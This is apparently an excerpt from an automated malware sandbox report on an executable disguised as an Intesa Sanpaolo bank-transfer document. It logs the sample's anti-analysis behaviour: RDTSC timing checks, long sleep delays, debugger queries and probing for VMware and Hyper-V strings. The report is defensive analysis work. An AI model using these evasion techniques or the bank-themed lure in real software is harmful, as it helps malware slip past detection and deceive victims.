          Source: C:\Windows\SysWOW64\control.exe API/Special instruction interceptor: Address: 7FFEFE52DA44
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 2539904 second address: 253990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 2539B7E second address: 2539B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory allocated: C90000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory allocated: 26C0000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory allocated: 2580000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory allocated: 8920000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory allocated: 9920000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory allocated: 9C30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Memory allocated: AC30000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6723
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2072
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4114
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 5821
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 883
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 852
          Source: C:\Windows\SysWOW64\control.exe Window / User API: threadDelayed 9841
          Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec), graph_7-13905
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe API coverage: 1.7 %
          Source: C:\Windows\SysWOW64\control.exe API coverage: 2.1 %
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe TID: 7584 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7408 Thread sleep count: 4114 > 30
          Source: C:\Windows\explorer.exe TID: 7408 Thread sleep time: -8228000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 7408 Thread sleep count: 5821 > 30
          Source: C:\Windows\explorer.exe TID: 7408 Thread sleep time: -11642000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 8080 Thread sleep count: 131 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 8080 Thread sleep time: -262000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 8080 Thread sleep count: 9841 > 30
          Source: C:\Windows\SysWOW64\control.exe TID: 8080 Thread sleep time: -19682000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
          Source: explorer.exe, 00000007.00000003.3083209786.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW6
          Source: explorer.exe, 00000007.00000003.2192144452.00000000087EE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1356491730.000000000085E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000r
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}Z
          Source: explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
          Source: explorer.exe, 00000007.00000003.2192144452.00000000087EE000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000000.00000002.1356491730.000000000085E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}AsVuser
          Source: explorer.exe, 00000007.00000003.3083209786.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.00000000087C2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3770457753.00000000087C2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}otti
          Source: explorer.exe, 00000007.00000002.3765674382.00000000005A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000\
          Source: explorer.exe, 00000007.00000000.1361155692.0000000004027000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s/U6
          Source: explorer.exe, 00000007.00000002.3770457753.0000000008761000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
          Source: explorer.exe, 00000007.00000000.1367583891.0000000008761000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00j
          Source: explorer.exe, 00000007.00000002.3765674382.00000000005A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000007.00000002.3771486078.00000000088E5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_0040ACF0 LdrLoadDll
          Source: C:\Windows\SysWOW64\control.exe Code function: 8_2_002269F5 IsDebuggerPresent
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe Code function: 6_2_01180115 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA30B mov eax, dword ptr fs:[00000030h]6_2_010FA30B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FA30B mov eax, dword ptr fs:[00000030h]6_2_010FA30B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BC310 mov ecx, dword ptr fs:[00000030h]6_2_010BC310
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E0310 mov ecx, dword ptr fs:[00000030h]6_2_010E0310
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01168350 mov ecx, dword ptr fs:[00000030h]6_2_01168350
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov ecx, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0114035C mov eax, dword ptr fs:[00000030h]6_2_0114035C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0118A352 mov eax, dword ptr fs:[00000030h]6_2_0118A352
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01142349 mov eax, dword ptr fs:[00000030h]6_2_01142349
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0116437C mov eax, dword ptr fs:[00000030h]6_2_0116437C
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E438F mov eax, dword ptr fs:[00000030h]6_2_010E438F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010E438F mov eax, dword ptr fs:[00000030h]6_2_010E438F
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BE388 mov eax, dword ptr fs:[00000030h]6_2_010BE388
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BE388 mov eax, dword ptr fs:[00000030h]6_2_010BE388
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BE388 mov eax, dword ptr fs:[00000030h]6_2_010BE388
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B8397 mov eax, dword ptr fs:[00000030h]6_2_010B8397
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B8397 mov eax, dword ptr fs:[00000030h]6_2_010B8397
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B8397 mov eax, dword ptr fs:[00000030h]6_2_010B8397
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011643D4 mov eax, dword ptr fs:[00000030h]6_2_011643D4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011643D4 mov eax, dword ptr fs:[00000030h]6_2_011643D4
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA3C0 mov eax, dword ptr fs:[00000030h]6_2_010CA3C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C83C0 mov eax, dword ptr fs:[00000030h]6_2_010C83C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C83C0 mov eax, dword ptr fs:[00000030h]6_2_010C83C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C83C0 mov eax, dword ptr fs:[00000030h]6_2_010C83C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C83C0 mov eax, dword ptr fs:[00000030h]6_2_010C83C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011463C0 mov eax, dword ptr fs:[00000030h]6_2_011463C0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_0117C3CD mov eax, dword ptr fs:[00000030h]6_2_0117C3CD
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D03E9 mov eax, dword ptr fs:[00000030h]6_2_010D03E9
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010F63FF mov eax, dword ptr fs:[00000030h]6_2_010F63FF
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE3F0 mov eax, dword ptr fs:[00000030h]6_2_010DE3F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE3F0 mov eax, dword ptr fs:[00000030h]6_2_010DE3F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010DE3F0 mov eax, dword ptr fs:[00000030h]6_2_010DE3F0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B823B mov eax, dword ptr fs:[00000030h]6_2_010B823B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C6259 mov eax, dword ptr fs:[00000030h]6_2_010C6259
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01148243 mov eax, dword ptr fs:[00000030h]6_2_01148243
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01148243 mov ecx, dword ptr fs:[00000030h]6_2_01148243
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010BA250 mov eax, dword ptr fs:[00000030h]6_2_010BA250
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010B826B mov eax, dword ptr fs:[00000030h]6_2_010B826B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01170274 mov eax, dword ptr fs:[00000030h]6_2_01170274
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C4260 mov eax, dword ptr fs:[00000030h]6_2_010C4260
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C4260 mov eax, dword ptr fs:[00000030h]6_2_010C4260
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010C4260 mov eax, dword ptr fs:[00000030h]6_2_010C4260
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FE284 mov eax, dword ptr fs:[00000030h]6_2_010FE284
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010FE284 mov eax, dword ptr fs:[00000030h]6_2_010FE284
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01140283 mov eax, dword ptr fs:[00000030h]6_2_01140283
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01140283 mov eax, dword ptr fs:[00000030h]6_2_01140283
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01140283 mov eax, dword ptr fs:[00000030h]6_2_01140283
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D02A0 mov eax, dword ptr fs:[00000030h]6_2_010D02A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D02A0 mov eax, dword ptr fs:[00000030h]6_2_010D02A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011562A0 mov eax, dword ptr fs:[00000030h]6_2_011562A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011562A0 mov ecx, dword ptr fs:[00000030h]6_2_011562A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011562A0 mov eax, dword ptr fs:[00000030h]6_2_011562A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011562A0 mov eax, dword ptr fs:[00000030h]6_2_011562A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011562A0 mov eax, dword ptr fs:[00000030h]6_2_011562A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_011562A0 mov eax, dword ptr fs:[00000030h]6_2_011562A0
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA2C3 mov eax, dword ptr fs:[00000030h]6_2_010CA2C3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA2C3 mov eax, dword ptr fs:[00000030h]6_2_010CA2C3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA2C3 mov eax, dword ptr fs:[00000030h]6_2_010CA2C3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA2C3 mov eax, dword ptr fs:[00000030h]6_2_010CA2C3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010CA2C3 mov eax, dword ptr fs:[00000030h]6_2_010CA2C3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D02E1 mov eax, dword ptr fs:[00000030h]6_2_010D02E1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D02E1 mov eax, dword ptr fs:[00000030h]6_2_010D02E1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_010D02E1 mov eax, dword ptr fs:[00000030h]6_2_010D02E1
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01156500 mov eax, dword ptr fs:[00000030h]6_2_01156500
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194500 mov eax, dword ptr fs:[00000030h]6_2_01194500
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194500 mov eax, dword ptr fs:[00000030h]6_2_01194500
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194500 mov eax, dword ptr fs:[00000030h]6_2_01194500
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194500 mov eax, dword ptr fs:[00000030h]6_2_01194500
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 6_2_01194500 mov eax, dword ptr fs:[00000030h]6_2_01194500
